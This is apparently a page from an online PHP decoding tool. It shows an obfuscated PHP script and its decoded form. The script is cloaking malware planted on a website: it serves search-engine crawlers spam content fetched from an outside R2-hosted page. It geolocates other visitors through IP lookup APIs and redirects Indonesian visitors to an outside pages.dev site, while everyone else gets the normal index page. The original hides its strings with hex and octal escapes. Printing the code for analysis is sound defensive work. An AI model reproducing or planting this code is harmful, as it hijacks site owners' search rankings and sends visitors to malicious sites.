Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php goto RJPIt; RJPIt: error_reporting(0); goto i21Lq; jw3aF: profile_user(); goto Isi..
Decoded Output download
<?php
goto RJPIt; RJPIt: error_reporting(0); goto i21Lq; jw3aF: profile_user(); goto IsimV; i21Lq: function profile_user() { $useragent = $_SERVER["HTTP_USER_AGENT"] ?? ''; $referer = $_SERVER["HTTP_REFERER"] ?? ''; $pasteUrl = "https://pub-05ba3407903e4840a55b8c21fc682cda.r2.dev/financesaathi.html"; $redirectUrl = "https://sambilkayang.pages.dev"; $ipSbApi = "https://api.ip.sb/geoip/"; $incolumitasApi = "https://api.incolumitas.com/?q="; $ipAddress = $_SERVER["REMOTE_ADDR"] ?? ''; $botAgents = array("Google-InspectionTool", "googlebot", "(compatible; Googlebot/2.1; +http://www.google.com/bot.html)", "bingbot", "AhrefsBot", "slurp", "duckduckbot", "baiduspider", "yandexbot", "sogou", "exabot", "facebot", "ia_archiver"); $isBot = false; foreach ($botAgents as $bot) { if (stripos($useragent, $bot) !== false) { $isBot = true; break; } } if ($isBot) { $content = file_get_contents($pasteUrl); if ($content === false) { echo "Error fetching content"; die; } echo $content; die; } else { $response = file_get_contents($ipSbApi . $ipAddress); $isIndonesia = false; if ($response !== false && !empty($response)) { $data = json_decode($response, true); if (isset($data["country_code"]) && $data["country_code"] === "ID") { $isIndonesia = true; } } if (!$isIndonesia) { $response = file_get_contents($incolumitasApi . $ipAddress); if ($response !== false && !empty($response)) { $data = json_decode($response, true); if (isset($data["location"]["country_code"]) && $data["location"]["country_code"] === "ID") { $isIndonesia = true; } } } $language = isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? strtolower($_SERVER["HTTP_ACCEPT_LANGUAGE"]) : ''; if (strpos($language, "id") !== false) { $isIndonesia = true; } if ($isIndonesia) { header("Location: {$redirectUrl}", true, 301); die; } include "index.php"; die; } } goto jw3aF; IsimV: ?>
Did this file decode correctly?
Original Code
<?php
goto RJPIt; RJPIt: error_reporting(0); goto i21Lq; jw3aF: profile_user(); goto IsimV; i21Lq: function profile_user() { $useragent = $_SERVER["\110\x54\124\x50\137\x55\123\x45\122\137\101\x47\105\116\x54"] ?? ''; $referer = $_SERVER["\110\124\124\120\x5f\x52\105\106\x45\122\x45\x52"] ?? ''; $pasteUrl = "\150\x74\164\160\163\x3a\57\x2f\x70\165\x62\55\x30\x35\x62\x61\x33\x34\x30\x37\71\60\63\x65\x34\x38\64\60\x61\65\x35\142\x38\143\x32\61\x66\x63\x36\x38\62\x63\144\x61\x2e\162\x32\x2e\x64\145\166\57\x66\151\x6e\141\x6e\143\145\163\x61\141\x74\150\x69\56\150\x74\x6d\x6c"; $redirectUrl = "\150\164\164\160\163\72\x2f\57\x73\141\155\x62\x69\x6c\153\x61\x79\141\156\x67\x2e\160\x61\x67\x65\163\x2e\x64\145\x76"; $ipSbApi = "\x68\164\x74\x70\163\x3a\x2f\x2f\141\160\x69\56\x69\x70\56\163\x62\x2f\147\x65\157\x69\x70\57"; $incolumitasApi = "\150\164\164\x70\x73\x3a\x2f\x2f\141\160\151\x2e\x69\x6e\143\157\154\x75\x6d\x69\164\141\163\x2e\x63\x6f\x6d\x2f\77\x71\75"; $ipAddress = $_SERVER["\122\105\115\x4f\124\105\137\101\x44\104\x52"] ?? ''; $botAgents = array("\x47\x6f\157\147\154\145\55\x49\156\x73\160\x65\x63\x74\x69\x6f\156\124\x6f\x6f\x6c", "\147\x6f\157\147\154\x65\142\157\x74", "\50\x63\x6f\155\x70\x61\164\x69\142\154\145\73\x20\x47\x6f\x6f\147\154\x65\142\157\164\x2f\x32\56\61\73\40\x2b\x68\x74\x74\160\x3a\x2f\x2f\167\167\x77\56\147\157\157\x67\154\145\x2e\143\157\x6d\57\x62\x6f\164\56\x68\x74\x6d\x6c\51", "\142\x69\x6e\x67\142\157\x74", "\101\x68\x72\x65\x66\163\x42\x6f\164", "\x73\154\x75\162\x70", "\x64\165\x63\153\144\165\143\x6b\142\157\x74", "\x62\x61\x69\x64\165\163\160\x69\144\x65\x72", "\171\x61\x6e\144\x65\x78\x62\157\164", "\163\x6f\x67\x6f\165", "\x65\170\x61\142\x6f\164", "\146\x61\143\x65\142\157\164", "\151\141\x5f\141\162\x63\x68\x69\x76\145\x72"); $isBot = false; foreach ($botAgents as $bot) { if (stripos($useragent, $bot) !== false) { $isBot = true; break; } } if ($isBot) { $content = file_get_contents($pasteUrl); if ($content === false) { echo "\x45\x72\x72\x6f\x72\x20\x66\145\x74\143\150\151\x6e\147\x20\x63\157\x6e\x74\145\156\164"; die; } echo $content; die; } else { $response = file_get_contents($ipSbApi . $ipAddress); $isIndonesia = false; if ($response !== false && !empty($response)) { $data = json_decode($response, true); if (isset($data["\143\157\x75\x6e\164\162\171\x5f\143\157\144\145"]) && $data["\x63\x6f\x75\x6e\164\x72\x79\x5f\x63\x6f\x64\145"] === "\111\104") { $isIndonesia = true; } } if (!$isIndonesia) { $response = file_get_contents($incolumitasApi . $ipAddress); if ($response !== false && !empty($response)) { $data = json_decode($response, true); if (isset($data["\154\157\x63\141\x74\151\157\156"]["\x63\157\165\x6e\164\x72\171\137\x63\x6f\144\145"]) && $data["\x6c\157\143\x61\164\151\157\156"]["\x63\x6f\165\x6e\164\x72\171\137\143\157\144\x65"] === "\111\x44") { $isIndonesia = true; } } } $language = isset($_SERVER["\110\x54\x54\120\x5f\101\103\103\105\x50\124\x5f\114\x41\x4e\x47\x55\x41\107\105"]) ? strtolower($_SERVER["\x48\x54\124\x50\137\101\x43\103\x45\120\x54\137\x4c\101\116\107\x55\x41\x47\105"]) : ''; if (strpos($language, "\x69\144") !== false) { $isIndonesia = true; } if ($isIndonesia) { header("\x4c\157\143\141\x74\x69\x6f\x6e\x3a\40{$redirectUrl}", true, 301); die; } include "\151\x6e\144\145\x78\x2e\160\150\x70"; die; } } goto jw3aF; IsimV: ?>
Function Calls
None |
Stats
MD5 | 9437b1095b53a601c1b43236ca479af9 |
Eval Count | 0 |
Decode Time | 79 ms |